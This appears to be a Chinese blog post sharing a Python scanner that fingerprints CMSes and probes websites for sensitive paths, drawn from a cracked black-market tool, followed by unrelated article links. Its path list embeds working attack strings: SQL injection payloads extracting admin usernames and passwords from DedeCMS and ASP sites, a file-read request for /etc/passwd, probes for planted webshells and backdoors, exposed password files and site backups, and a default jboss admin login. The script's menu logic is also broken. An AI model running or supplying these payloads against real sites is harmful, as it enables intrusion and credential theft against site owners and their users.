前言:

之前逛SAFEING极客社区的时候

发现一款黑市卖2000多的软件,后面下载了

打不开。发现config文件里面有些不错的东西。总结了一下

有了以下的脚本。

脚本用处:

【1】探测CMS(不敢说百分百吧,起码准确率不低于80%) 加大了判断

【2】挖掘敏感目录下存在的漏洞

代码:

hack.py

import requests

import re

import threading

import json

print('banner')

banner=""" _   _            _     ____

| | | | __ _  ___| | __/ ___|  ___ __ _ _ __

| |_| |/ _` |/ __| |/ /\___ \ / __/ _` | '_ \

|  _  | (_| | (__|   <  ___) | (_| (_| | | | |

|_| |_|\__,_|\___|_|\_\|____/ \___\__,_|_| |_|

"""

print('[1]CMS识别与CMS特殊路径收集')

print('[2]敏感目录扫描')

print(banner)

xz=input('请选择:')

def ini():

    global e

    import configparser

    conf = configparser.ConfigParser()

    cmserror = []

    conf.read('hackscan.ini')

    error = conf.get('cmscanerror', 'error')

    error1 = conf.get('cmscanerror', 'error1')

    error2 = conf.get('cmscanerror', 'error2')

    error3 = conf.get('cmscanerror', 'error3')

    error4 = conf.get('cmscanerror', 'error4')

    error5 = conf.get('cmscanerror', 'error5')

    error6 = conf.get('cmscanerror', 'error6')

    error7 = conf.get('cmscanerror', 'error7')

    error8 = conf.get('cmscanerror', 'error8')

    error9 = conf.get('cmscanerror', 'error9')

    error10 = conf.get('cmscanerror', 'error10')

    error11 = conf.get('cmscanerror', 'error11')

    error12 = conf.get('cmscanerror', 'error12')

    cmserror.append(error1)

    cmserror.append(error2)

    cmserror.append(error3)

    cmserror.append(error4)

    cmserror.append(error5)

    cmserror.append(error6)

    cmserror.append(error7)

    cmserror.append(error8)

    cmserror.append(error9)

    cmserror.append(error10)

    cmserror.append(error11)

    cmserror.append(error12)

    for e in cmserror:

        pass

ini()

def cmsscan():

    user = input('输入要扫描的url:')

    print('[&]识别CMS,并扫描出CMS存活的路径')

    yuanheaders={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

    yuan=user.rstrip().rstrip('/')

    yuans=requests.get(url=yuan,headers=yuanheaders,allow_redirects=False)

    yuanlen=len(yuans.text)

    print('[@]扫描中....')

    with open('data.json', 'r') as b:

        a = json.load(b)

        lisw = eval(str(a))

        for x in lisw:

            cms=x['url']

            cmsname=x['name']

            headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

            urls=user.rstrip().rstrip('/')+cms

            cmssb=requests.get(url=urls,headers=headers,allow_redirects=False)

            cmslen=len(cmssb.text)

            if cmssb.status_code == 200 and yuanlen != cmslen:

                    print('[*]识别到的CMSurl:{}'.format(cmssb.url))

                    print('[*]CMS为:{}'.format(cmsname))

            else:

               pass

def mgscan():

    user = input('输入要扫描的url:')

    with open('漏洞.txt', 'r') as a:

        for x in a.readlines():

            url = re.findall('(.*?)\|\|', x.strip())

            names = re.findall('\|\|(.*)', x.strip())

            urls = "".join(url)

            payload=user.rstrip().rstrip('/')+urls

            namess="".join(names)

            headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}

            mgs=requests.get(url=payload,headers=headers,allow_redirects=False)

            if mgs.status_code == 200:

                if e in str(mgs.text):

                    pass

                else:

                    print('[*]扫描出的敏感目录:{}'.format(mgs.url))

                    print(namess)

def main():

    while True:

        if xz == '':

            c=threading.Thread(target=cmsscan,args=())

            c.start()

            break

        elif xz == '':

            mgscan()

            m=threading.Thread(target=mgscan,args=())

            m.start()

        else:

            print('[-]输入不能为空!')

            continue

main()

hacksca.ini

[cmscanerror]

error=找不到这个文件

error1=找不到该网页

error2=NotFound

error3=这个网页迷失了

error4=不存在

error5=不存在该网页

error6=404

error7=您无权访问该网页

error8=防火墙

error9=没有这个网页

error10=网页不见了

error11=ERROR

error12=errors

漏洞.txt

/FCKeditor/editor/filemanager/connectors/uploadtest.html||File Upload|Fck上传,请手动检测

/FCKeditor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用

/FCKeditor/editor/filemanager/upload/test.html||File Upload|Fck上传,请手动检测

/FCKeditor/editor/filemanager/upload/test.html||查阅fckeditor漏洞利用

/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php||Tinymce漏洞

/adminer.php||MYSQL管理界面

/wp-login.php||wordpress登陆界面

/blog/wp-login.php||wordpress登陆界面

/wordpress/wp-login.php||wordpress登陆界面

/phpmyadmin/index.php||MYSQL管理界面

/admin.txt||密码文件

/pass.txt||密码文件

/qq.txt||密码文件

/bigdump.php||Php数据库管理文件 Exp:http://host/bigdump.php?start=

/config.txt||密码文件

/extras/curltest.php||ZENcart系统漏洞文件

/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html||Opencart 1.4.9.1 - Remote File Upload Vulnerability

/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media||ZENcart系统漏洞文件

/editors/fckeditor/editor/filemanager/upload/php/upload.php||FCK编辑器上传

/includes/templates/template_default/buttons/english/button_add_address.gif||zencart系统

/editors/htmlarea/plugins/ImageManager/images.php||Tinymce漏洞

/editors/tiny_mce/plugins/ImageManager/manager.php||ZENcart系统漏洞文件

/editors/tiny_mce/plugins/filemanager/pages/fm/index.html||Tinymce漏洞

/.svn/entries||svn漏洞

/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='||SQL注入

/WEB-INF/classes/jmx-console-users.properties||JSP敏感文件

/admin/diy.asp||后们木马

/admin/system/editor/FCKeditor/editor/fckeditor.Html||fckeditor漏洞

/autogetarticle/_GetLockPic.php?p=/etc/passwd||查阅"DoNews任意文件下载

/diy.asp||后门木马

/editor/editor/filemanager/browser/default/connectors/test.html|File Upload|Fck上传,请手动检测

/editor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用

/editor/editor/filemanager/connectors/test.html|File Upload|Fck上传,请手动检测

/editor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用

/editor/editor/filemanager/connectors/uploadtest.html|File Upload|Fck上传,请手动检测

/editor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用

/editor/editor/filemanager/upload/test.html||查阅fckeditor漏洞利用

/fckeditor/editor/filemanager/browser/default/connectors/test.html|www.fckeditor.net|Fck上传,请手动检测

/fckeditor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用

/fckeditor/editor/filemanager/connectors/test.html|File Upload|Fck上传,请手动检测

/fckeditor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用

/includes/modules/payment/alipay.php||查alipay.php利用

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a||DEDE注入漏洞

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a||DEDE注入漏洞

/web-console/||用admin-admin尝试登录-jboss漏洞

/webmanage/FCKeditor/editor/filemanager/connectors/uploadtest.html||查阅fckeditor漏洞利用

/webmanage/fckeditor/editor/filemanager/browser/default/connectors/test.html||查阅fckeditor漏洞利用

/webmanage/fckeditor/editor/filemanager/connectors/test.html||查阅fckeditor漏洞利用

/1.rar||敏感文件

/1.zip||敏感文件

/147.rar||敏感文件

/2.rar||敏感文件

/2.zip||敏感文件

/369.rar||敏感文件

/HYTop.mdb||木马备份的整站

/Upfile_AdPia.asp||上传后缀

/Upfile_AdPic.asp||上传后缀

/Upfile_Articla.asp||上传后缀

/Upfile_Article.asp||上传后缀

/Upfile_Dialog.asp||上传后缀

/Upfile_OrderPic.asp||上传后缀

/admimistrator||可能为管理员后台路径

/admin.rar||关键文件

/admin.zip||关键文件

/admin||可能为管理员后台路径

/c99.php|s|老外木马,有通杀后门http://www.blackploit.com/2014/06/backdoor-en-shell-c99php-bypass-password.html

/data.rar||数据库文件

/data.zip||数据库文件

/db.rar||数据库文件

/db.zip||数据库文件

/fdsa.rar||整站文件

/fdsa.zip||整站文件

/flashfxp.rar||关键文件

/flashfxp.zip||关键文件

/ftp.txt||密码文件

/gg.rar||关键文件

/manage||可能为管理员后台路径

/password.txt||密码文件

/root.rar||整站文件

/root.zip||整站文件

/sb.rar||敏感文件

/server.rar||敏感文件

/server/default/conf/props/jmx-console-users.propertie||查阅jboss漏洞

/sf.rar||敏感文件

/shop.mdb||敏感文件

/sql.rar||敏感文件

/test.rar||敏感文件

/unix.rar||敏感文件

/upfile.asp||上传后缀

/upfile_adpic.asp||上传后缀

/upfile_flash.asp||上传后缀

/upfile_photo.asp||上传后缀

/upfile_softpic.asp||上传后缀

/upload.asp||上传后缀

/user.dat||敏感文件

/user.rar||敏感文件

/vip.rar||关键文件

/wangzhan.rar||整站文件

/wangzhan.zip||整站文件

/web.rar||整站文件

/web.zip||整站文件

/wo.rar||敏感文件

/www.rar||整站文件

/www.zip||整站文件

/wwwroot.rar||整站文件

/wwwroot.zip||整站文件

/wz.rar||整站文件

/wz.zip||整站文件

/复件 wwww.rar||关键文件

/复件 新建文件夹.rar||关键文件

/新建文件夹.rar||关键文件

/新建文件夹.zip||关键文件

/软件.rar||关键文件

data.json

点我:https://paste.ubuntu.com/p/yhpKvCZvK6/

测试结果:

这个脚本会不定期更新

python写个Hack Scan的更多相关文章

  1. Python写各大聊天系统的屏蔽脏话功能原理

    Python写各大聊天系统的屏蔽脏话功能原理 突然想到一个视频里面弹幕被和谐的一满屏的*号觉得很有趣,然后就想用python来试试写写看,结果还真玩出了点效果,思路是首先你得有一个脏话存放的仓库好到时 ...

  2. python写红包的原理流程包含random,lambda其中的使用和见简单介绍

    Python写红包的原理流程 首先来说说要用到的知识点,第一个要说的是扩展包random,random模块一般用来生成一个随机数 今天要用到ramdom中unifrom的方法用于生成一个指定范围的随机 ...

  3. Python写地铁的到站的原理简易版

    Python地铁的到站流程及原理(个人理解) 今天坐地铁看着站牌就莫名的想如果用Python写其工作原理 是不是很简单就小试牛刀了下大佬们勿喷纯属小弟个人理解 首先来看看地铁上显示的站牌如下: 就想这 ...

  4. 用Python写一个简单的Web框架

    一.概述 二.从demo_app开始 三.WSGI中的application 四.区分URL 五.重构 1.正则匹配URL 2.DRY 3.抽象出框架 六.参考 一.概述 在Python中,WSGI( ...

  5. 读书笔记汇总 --- 用Python写网络爬虫

    本系列记录并分享:学习利用Python写网络爬虫的过程. 书目信息 Link 书名: 用Python写网络爬虫 作者: [澳]理查德 劳森(Richard Lawson) 原版名称: web scra ...

  6. Python写UTF8文件,UE、记事本打开依然乱码的问题

    Python写UTF8文件,UE.记事本打开依然乱码的问题 Leave a reply 现象:使用codecs打开文件,写入UTF-8文本,正常无错误.用vim打开正常,但记事本.UE等打开乱码. 原 ...

  7. python 写的http后台弱口令爆破工具

    今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ...

  8. python写xml文件

    为了便于后续的读取处理,这里就将信息保存在xml文件中,想到得到的文件如下: 1 <?xml version="1.0" encoding="utf-8" ...

  9. Python之美[从菜鸟到高手]--一步一步动手给Python写扩展(异常处理和引用计数)

    我们将继续一步一步动手给Python写扩展,通过上一篇我们学习了如何写扩展,本篇将介绍一些高级话题,如异常,引用计数问题等.强烈建议先看上一篇,Python之美[从菜鸟到高手]--一步一步动手给Pyt ...

随机推荐

  1. 解决visual studio2017没有系统类和方法注释的问题

    好几次碰到这种情况了,每次都得稍微查一查才能解决这个问题,相信也有不少人遇到这个问题,在对方法还不是很熟练的时候,将鼠标放置到方法上去,就会有信息提示是一件非常方便的事情,本文的解决方法同样适用于只显 ...

  2. 2018秋C语言程序设计(初级)作业- 第3次作业

    7-1 找出最小值 #include<stdio.h> int main() { int min,i,n,count; scanf("%d",&n); for( ...

  3. CXF生成本地ws调用代码测试webservice

    package com.free.webservice.client; import java.util.List; import cn.com.webxml.*; public class Weat ...

  4. JAVA多线程----用--取钱问题2

    在该示例代码中,TestAccount类是测试类,主要实现创建帐户Account类的对象,以及启动学生线程StudentThread和启动家长线程GenearchThread.在StudentThre ...

  5. FreeMarker自定义TemplateDirectiveModel

    [参考:http://blog.csdn.net/fangzhangsc2006/article/details/8687371] 在采用FreeMarker做前台视图模板的情况下,我们可以通过< ...

  6. 《DSP using MATLAB》示例Example 8.15

  7. 细说VS MSBuild 和 Framework 的区别

    如今已经是 VS2017 横行的时代,而据我所知,大部分人还停留在使用 VS2015 VS2013 或更低的版本,主要是因为他们参与的项目基本使用这几个VS的版本开发的.眼红VS2017却不敢升级,主 ...

  8. 数学杂烩总结(多项式/形式幂级数+FWT+特征多项式+生成函数+斯特林数+二次剩余+单位根反演+置换群)

    数学杂烩总结(多项式/形式幂级数+FWT+特征多项式+生成函数+斯特林数+二次剩余+单位根反演+置换群) 因为不会做目录所以请善用ctrl+F 本来想的是笔记之类的,写着写着就变成了资源整理 一些有的 ...

  9. 部署coredns

      1 前提:     1.1不依赖kubeadm的方式,适用于不是使用kubeadm创建的k8s集群,或者kubeadm初始化集群之后,删除了dns相关部署.      1.2 DNS IP :10 ...

  10. 从wiresharp看tcp三次握手

    我们知道,传输层是OSI模型中用户进行数据传输的分层,目前仅有TCP和UDP两种协议可用.TCP为了进行传输控制,引入了三次握手机制,以确保通信连接的建立.道理很简单,我们跟别人打电话聊天时,对方拿起 ...